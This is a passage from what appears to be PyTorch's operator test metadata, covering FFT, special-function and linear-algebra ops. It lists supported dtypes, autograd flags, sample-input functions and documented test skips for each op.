                     DecorateInfo(precisionOverride({torch.float: 2e-4}), 'TestFFT', 'test_reference_nd')],
                 ),
SpectralFuncInfo('fft.irfft',
                 aten_name='fft_irfft',
                 ref=np.fft.irfft,
                 ndimensional=SpectralFuncType.OneD,
                 supports_forward_ad=True, supports_fwgrad_bwgrad=True,
                 dtypes=all_types_and_complex_and(torch.bool),
                 # rocFFT doesn't support Half/Complex Half Precision FFT
                 # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs
                 dtypesIfCUDA=all_types_and_complex_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)),
                 check_batched_gradgrad=False),
SpectralFuncInfo('fft.irfft2',
                 aten_name='fft_irfft2',
                 ref=np.fft.irfft2,
                 ndimensional=SpectralFuncType.TwoD,
                 supports_forward_ad=True, supports_fwgrad_bwgrad=True,
                 dtypes=all_types_and_complex_and(torch.bool),
                 # rocFFT doesn't support Half/Complex Half Precision FFT
                 # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs
                 dtypesIfCUDA=all_types_and_complex_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)),
                 check_batched_gradgrad=False,
                 decorators=[
                     DecorateInfo(precisionOverride({torch.float: 1e-4, torch.cfloat: 1e-4}), 'TestFFT', 'test_reference_nd')],
                 ),
SpectralFuncInfo('fft.irfftn',
                 aten_name='fft_irfftn',
                 ref=np.fft.irfftn,
                 ndimensional=SpectralFuncType.ND,
                 supports_forward_ad=True, supports_fwgrad_bwgrad=True,
                 dtypes=all_types_and_complex_and(torch.bool),
                 # rocFFT doesn't support Half/Complex Half Precision FFT
                 # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs
                 dtypesIfCUDA=all_types_and_complex_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)),
                 check_batched_gradgrad=False,
                 decorators=[
                     DecorateInfo(precisionOverride({torch.float: 1e-4, torch.cfloat: 1e-4}), 'TestFFT', 'test_reference_nd')],
                 ),
OpInfo('fft.fftshift',
       dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half),
       sample_inputs_func=sample_inputs_fftshift,
       supports_out=False,
       supports_forward_ad=True, supports_fwgrad_bwgrad=True,
       ),
OpInfo('fft.ifftshift',
       dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half),
       sample_inputs_func=sample_inputs_fftshift,
       supports_out=False,
       supports_forward_ad=True, supports_fwgrad_bwgrad=True,
       ),
OpInfo('stft',
       decorators=[
           skipCPUIfNoFFT,
           DecorateInfo(unittest.skip("Skipped!
stft does not match the native function"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ], dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_stft, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_out=False, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, ), OpInfo('istft', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_istft, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_out=False, decorators=( DecorateInfo(unittest.skip("Skipped! istft does not match the native function"), 'TestJit', 'test_variant_consistency_jit'), ), skips=( skipCPUIfNoFFT, # gradcheck fails on ROCm (gh-68429) # grad is computed improperly (probably for weights tensor) DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_grad'), )), UnaryUfuncInfo('floor', ref=np.floor, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True), OpInfo('flip', op=torch.flip, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_flip, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('fliplr', op=torch.fliplr, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_fliplr_flipud, error_inputs_func=error_inputs_fliplr, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('flipud', op=torch.flipud, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_fliplr_flipud, error_inputs_func=error_inputs_flipud, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('sparse.sampled_addmm', dtypes=floating_and_complex_types(), supports_autograd=True, sample_inputs_func=sample_inputs_sparse_sampled_addmm, decorators=[ skipCUDAIf(_get_torch_cuda_version() < (11, 3), "cusparseSDDMM was added in 11.2.1"), skipCPUIfNoMklSparse, ], skips=( # NotImplementedError: Tensors of type SparseCsrTensorImpl do not have is_contiguous DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_noncontiguous_samples'), # RuntimeError: Sparse CSR tensors do not have strides. 
DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out'), # RuntimeError: sampled_addmm: Expected result to have sparse csr layout, but got Strided DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out_warning'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestCompositeCompliance', 'test_operator'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestCompositeCompliance', 'test_backward'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_conj_view'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_conj_view'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # RuntimeError: unsupported memory format option Preserve DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # GradcheckError: gradcheck expects all tensor inputs are dense when check_sparse_nnz is set to False DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_fwgrad_bwgrad'), # GradcheckError: gradcheck expects all tensor inputs are dense when check_sparse_nnz is set to False DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), # GradcheckError: gradcheck expects all tensor inputs are dense when check_sparse_nnz is set to False DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), # GradcheckError: gradcheck expects all tensor inputs are dense when check_sparse_nnz is set to False DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD'), )), UnaryUfuncInfo('i0', ref=np_unary_ufunc_integer_promotion_wrapper( scipy.special.i0) if TEST_SCIPY else _NOTHING, aliases=('special.i0',), decorators=(precisionOverride({torch.bfloat16: 3e-1, torch.float16: 5e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), backward_dtypes=floating_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_i0_i1, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.int8,)), )), UnaryUfuncInfo('special.i0e', aten_name='special_i0e', ref=scipy.special.i0e if TEST_SCIPY else _NOTHING, decorators=(precisionOverride({torch.bfloat16: 3e-1, torch.float16: 3e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), backward_dtypes=floating_types(), sample_inputs_func=sample_inputs_i0_i1, supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('special.i1', aten_name='special_i1', ref=np_unary_ufunc_integer_promotion_wrapper(scipy.special.i1) if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool), dtypesIfCUDA=all_types_and(torch.bool), sample_inputs_func=sample_inputs_i0_i1, decorators=( DecorateInfo(toleranceOverride({ torch.float32: tol(atol=1e-4, rtol=0), torch.bool: tol(atol=1e-4, rtol=0)})), ), skips=( DecorateInfo(unittest.skip("Incorrect result!"), 'TestUnaryUfuncs', 
                       'test_reference_numerics_large', dtypes=(torch.int8,)),
                   ),
                   supports_fwgrad_bwgrad=True,
                   supports_forward_ad=True),
    UnaryUfuncInfo('special.i1e',
                   aten_name='special_i1e',
                   ref=scipy.special.i1e if TEST_SCIPY else _NOTHING,
                   dtypes=all_types_and(torch.bool),
                   dtypesIfCUDA=all_types_and(torch.bool),
                   sample_inputs_func=sample_inputs_i0_i1,
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True),
    UnaryUfuncInfo('special.ndtr',
                   aten_name='special_ndtr',
                   decorators=(precisionOverride({torch.bfloat16: 5e-3,
                                                  torch.float16: 5e-4}),),
                   ref=scipy.special.ndtr if TEST_SCIPY else _NOTHING,
                   dtypes=all_types_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and(torch.bool, torch.bfloat16, torch.float16),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   skips=(
                       # Dispatch stub: unsupported device typemeta
                       DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad',
                                    device_type='meta'),
                   )),
    BinaryUfuncInfo('floor_divide',
                    ref=_floor_divide_np,
                    dtypes=all_types_and(torch.half, torch.bfloat16),
                    supports_autograd=False,
                    rhs_make_tensor_kwargs=dict(exclude_zero=True),
                    supports_two_python_scalars=True,
                    skips=(
                        # AssertionError: Results of original model and exported/imported version of model differed
                        DecorateInfo(unittest.skip('Skipped!'), 'TestJit', 'test_variant_consistency_jit'),
                        # bfloat16 floor_divide compared with a float32 reference works inconsistently
                        DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs',
                                     dtypes=(torch.bfloat16,)),
                        # int8 floor divide has different results for -128 // -1 vs. NumPy
                        DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs',
                                     'test_reference_numerics_small_values',
                                     dtypes=(torch.int8,)),
                        # The following tests fail on some jobs
                        DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs',
                                     'test_reference_numerics_extremal_values',
                                     dtypes=(torch.float16,)),
                    )),
    UnaryUfuncInfo('frexp',
                   op=torch.frexp,
                   ref=np.frexp,
                   dtypes=floating_types_and(torch.half, torch.bfloat16),
                   dtypesIfCUDA=floating_types_and(torch.half),
                   # skip testing torch.frexp as it is not supported by ROCm platform yet
                   decorators=[],
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   skips=(
                       # skips the tests below as torch.frexp returns a tuple-like (mantissa, exponent) output,
                       # while these tests currently require the output to be a single tensor.
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_batch_vs_slicing'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_contig_vs_every_other'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_contig_vs_transposed'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_non_contig_expand'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_variant_consistency'),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_out_arg_all_dtypes'),
                       # skips test_reference_numerics due to error in Windows CI.
                       # np.frexp returns the exponent as np.intc dtype on the Windows platform,
                       # and np.intc does not have a corresponding torch dtype
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small',
                                    active_if=IS_WINDOWS),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    active_if=IS_WINDOWS),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    active_if=IS_WINDOWS),
                   )),
    BinaryUfuncInfo('ge',
                    ref=np.greater_equal,
                    aliases=('greater_equal',),
                    dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16),
                    always_returns_bool=True,
                    supports_autograd=False,),
    OpInfo('geqrf',
           dtypes=floating_and_complex_types(),
           sample_inputs_func=sample_inputs_linalg_qr_geqrf,
           decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack],
           supports_autograd=False,
           skips=(
               # FIXME: geqrf can't forward with complex inputs that require grad
               DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'),
               # Strides are not the same!
               DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),
           )),
    BinaryUfuncInfo('gt',
                    ref=np.greater,
                    aliases=('greater',),
                    dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16),
                    always_returns_bool=True,
                    supports_autograd=False,),
    UnaryUfuncInfo('imag',
                   ref=np.imag,
                   dtypes=complex_types_and(torch.chalf),
                   supports_out=False,
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   # See https://github.com/pytorch/pytorch/issues/66357
                   # RuntimeError: view_as_real doesn't work on unresolved conjugated tensors.
                   check_batched_forward_grad=False,
                   skips=(
                       # Skip since real and imag don't have out variants.
                       DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_out_arg_all_dtypes'),
                   )),
    OpInfo('gradient',
           dtypes=floating_and_complex_types_and(torch.int8, torch.int16, torch.int32, torch.int64,
                                                 torch.bfloat16, torch.half),
           supports_out=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           skips=(
               DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),
               # the following tests give a runtime error with an undefined value tensor
               # see discussion: https://github.com/pytorch/pytorch/issues/56660
               # RuntimeError:
               # Arguments for call are not valid.
               DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32, torch.complex64)),  # noqa: B950
               DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'),
           ),
           supports_inplace_autograd=False,
           sample_inputs_func=sample_inputs_gradient,
           error_inputs_func=error_inputs_gradient),
    OpInfo('inverse',
           op=torch.inverse,
           dtypes=floating_and_complex_types(),
           check_batched_gradgrad=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           gradcheck_nondet_tol=GRADCHECK_NONDET_TOL,
           sample_inputs_func=sample_inputs_linalg_invertible,
           decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack],
           skips=(
               # Strides are not the same!
               DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager',
                            device_type='mps', dtypes=[torch.float32]),
               DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit',
                            device_type='mps', dtypes=[torch.float32]),
           )),
    OpInfo('isin',
           dtypes=all_types(),
           dtypesIfCUDA=all_types_and(torch.half),
           supports_autograd=False,
           sample_inputs_func=sample_inputs_isin),
    OpInfo('kthvalue',
           dtypes=all_types_and(torch.bfloat16),
           dtypesIfCUDA=all_types_and(torch.float16),
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           sample_inputs_func=sample_inputs_kthvalue,
           error_inputs_func=error_inputs_kthvalue),
    BinaryUfuncInfo('le',
                    ref=np.less_equal,
                    aliases=('less_equal',),
                    dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16),
                    always_returns_bool=True,
                    supports_autograd=False,),
    OpInfo('linalg.det',
           op=torch.linalg.det,
           aliases=('det',),
           dtypes=floating_and_complex_types(),
           backward_dtypes=floating_and_complex_types(),
           aten_name='linalg_det',
           sample_inputs_func=sample_inputs_linalg_det,
           decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack,
                       DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-3, rtol=1e-3)}))],
           check_batched_gradgrad=False,
           supports_inplace_autograd=False),
    OpInfo('linalg.det',
           op=torch.linalg.det,
           variant_test_name='singular',
           aliases=('det',),
           dtypes=double_types(),
           backward_dtypes=double_types(),
           aten_name='linalg_det',
           sample_inputs_func=sample_inputs_linalg_det_singular,
           decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack,
                       DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-3, rtol=1e-3)}))],
           check_batched_gradgrad=False,
           supports_inplace_autograd=False,
           skips=(
               # These tests started breaking after touching the SVD.
               DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad',
                            device_type='cpu', dtypes=(torch.complex128,), active_if=IS_WINDOWS),
               DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'),
               # dtypes are tested in the suite above, no need to repeat it for singular
               DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes'),
           )),
    OpInfo('linalg.cholesky',
           aten_name='linalg_cholesky',
           dtypes=floating_and_complex_types(),
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           sample_inputs_func=sample_inputs_linalg_cholesky,
           gradcheck_wrapper=gradcheck_wrapper_hermitian_input,
           skips=(
               # Strides are not the same!
               DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),
           ),
           decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack],),
    OpInfo('linalg.cholesky_ex',
           aten_name='linalg_cholesky_ex',
           dtypes=floating_and_complex_types(),
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           sample_inputs_func=sample_inputs_linalg_cholesky,
           gradcheck_wrapper=gradcheck_wrapper_hermitian_input,
           skips=(
               # AssertionError: Scalars are not equal!
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), ), decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], ), OpInfo('linalg.cond', aten_name='linalg_cond', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_cond, check_batched_gradgrad=False, check_batched_forward_grad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off],), OpInfo('linalg.eig', aten_name='linalg_eig', op=torch.linalg.eig, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_eig, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # AssertionError: Scalars are not equal! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cpu'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), # Forward-over-reverse gradgrad might be incorrect DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ), decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, with_tf32_off], ), OpInfo('linalg.eigvals', aten_name='linalg_eigvals', op=torch.linalg.eigvals, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_invertible, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), # exits early on eager extremal value test DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.eigh', aten_name='linalg_eigh', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_eigh, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, with_tf32_off], skips=( # Forward-over-reverse gradgrad might be incorrect DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=complex_types()), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 
'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.eigvalsh', aten_name='linalg_eigvalsh', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_eigh, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.householder_product', aten_name='linalg_householder_product', op=torch.linalg.householder_product, aliases=('orgqr', ), dtypes=floating_and_complex_types(), # TODO: backward uses in-place operations that vmap doesn't like check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, sample_inputs_func=sample_inputs_householder_product, decorators=[ skipCUDAIfNoCusolver, skipCPUIfNoLapack, DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-3, rtol=1e-3)})), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ]), OpInfo('linalg.ldl_factor', aten_name='linalg_ldl_factor', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_ldl_factor, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, skipCUDAIfRocm], ), OpInfo('linalg.ldl_factor_ex', aten_name='linalg_ldl_factor_ex', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_ldl_factor, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, skipCUDAIfRocm], ), OpInfo('linalg.ldl_solve', aten_name='linalg_ldl_solve', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_ldl_solve, decorators=[ skipCUDAIf(_get_torch_cuda_version() < (11, 4), "not available before CUDA 11.3.1"), skipCUDAIfNoCusolver, skipCUDAIfRocm, skipCPUIfNoLapack], ), OpInfo('linalg.lstsq', aten_name='linalg_lstsq', dtypes=floating_and_complex_types(), supports_out=True, sample_inputs_func=sample_inputs_linalg_lstsq, error_inputs_func=error_inputs_lstsq, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # we skip gradient checks for this suite as they are tested in # variant_test_name='grad_oriented' DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), # At this time ROCm uses magma instead of rocSolver, and the test passes DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward', active_if=(not TEST_WITH_ROCM)), # The values for attribute 'shape' do not match DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), 
DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.lstsq', aten_name='linalg_lstsq', variant_test_name='grad_oriented', # gradchecks for forward AD fails with multi-Tensor outputs op=lambda a, b, driver: torch.linalg.lstsq(a, b, driver=driver)[0], supports_out=False, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_lstsq, error_inputs_func=error_inputs_lstsq, supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # tests do not work with passing lambda for op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), # At this time ROCm uses magma instead of rocSolver, and the test passes DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward', active_if=(not TEST_WITH_ROCM)), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', active_if=(not TEST_WITH_ROCM)), )), OpInfo('linalg.matrix_power', aliases=('matrix_power',), aten_name='linalg_matrix_power', dtypes=floating_and_complex_types(), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], sample_inputs_func=sample_inputs_linalg_matrix_power, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, skips=( # Strides are not the same! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), )), OpInfo('linalg.multi_dot', # Need this lambda because gradcheck does not work with TensorList inputs aten_name='linalg_multi_dot', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), supports_inplace_autograd=False, # Batched grad checks fail for empty input tensors (see https://github.com/pytorch/pytorch/issues/53407) check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_linalg_multi_dot, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, skips=( # https://github.com/pytorch/pytorch/issues/67470 DecorateInfo(unittest.skip("67470!"), 'TestCommon', 'test_noncontiguous_samples'), # Fails on XLA. # AssertionError: False is not true : Tensors failed to compare as equal! DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla', dtypes=(torch.long,)), # https://github.com/pytorch/pytorch/issues/71774 DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.long,)), )), # NB: linalg.norm has two variants so that different skips can be used for different sample inputs OpInfo('linalg.norm', op=torch.linalg.norm, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], sample_inputs_func=sample_inputs_linalg_norm, supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # Could not allocate memory to change Tensor SizesAndStrides! 
check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, aten_name='linalg_norm', skips=( DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), )), OpInfo('linalg.norm', op=torch.linalg.norm, variant_test_name='subgradients_at_zero', dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], sample_inputs_func=partial(sample_inputs_linalg_norm, variant='subgradient_at_zero'), aten_name='linalg_norm', supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, skips=( # [NEW] Skips specifically for sample inputs at zero # norm's vjp/jvp are not well-conditioned near zero DecorateInfo(unittest.expectedFailure, "TestGradients", 'test_fn_gradgrad'), DecorateInfo(unittest.expectedFailure, "TestGradients", 'test_fn_fwgrad_bwgrad') )), OpInfo('linalg.matrix_norm', 